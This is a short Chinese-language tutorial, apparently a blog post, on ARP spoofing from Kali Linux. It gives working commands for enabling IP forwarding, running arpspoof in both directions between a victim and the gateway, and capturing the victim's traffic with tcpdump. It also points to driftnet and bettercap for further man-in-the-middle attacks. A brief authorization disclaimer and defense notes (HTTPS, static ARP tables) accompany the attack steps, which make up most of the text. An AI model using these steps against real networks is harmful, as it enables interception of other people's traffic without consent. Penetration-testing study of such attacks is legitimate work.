kali arp欺骗

ARP欺骗(ARP Spoofing)的核心是伪造网关与目标设备的MAC地址映射,让流量经过你的Kali主机。请务必仅在自有网络或获得书面授权的环境中测试。

以下是使用 arpspoof(最简单)的标准步骤:

  1. 开启IP转发(让目标能正常上网,避免断网)

```bash

echo 1 > /proc/sys/net/ipv4/ip_forward

```

  1. 执行欺骗(需要两个终端窗口)

· 窗口1 - 欺骗目标(告诉目标:我是网关)

```bash

sudo arpspoof -i 网卡名 -t 目标IP 网关IP

```

· 窗口2 - 欺骗网关(告诉网关:我是目标)

```bash

sudo arpspoof -i 网卡名 -t 网关IP 目标IP

```

常用参数替换:-i eth0(你的网卡),-t 192.168.1.100(受害者),192.168.1.1(网关)。

  1. 验证与抓包

· 查看流量:sudo tcpdump -i eth0 host 目标IP

· 用 driftnet 抓图片,或 bettercap 进行更高级的中间人攻击。

停止欺骗:Ctrl+C 结束两个窗口,系统约30秒后自动恢复ARP表。或执行 ip link set arp off/on 快速重置。

现代防御:HTTPS加密网站(如银行、支付宝)只能抓到乱码,无法获取密码。开启ARP防火墙或使用静态ARP表可防御。

相关推荐
四月天439 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
菩提小狗12 小时前
每日安全情报报告 · 2026-07-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 天前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
中云DDoS CC防护蔡蔡1 天前
短信验证码被攻击怎么办
运维·经验分享·http·网络安全·微信
菩提小狗2 天前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全
忡黑梨2 天前
安装 Claude Code(使用 DeepSeek API)
网络·网络安全
零零信安19 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手19 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub19 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
爱网络爱Linux19 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp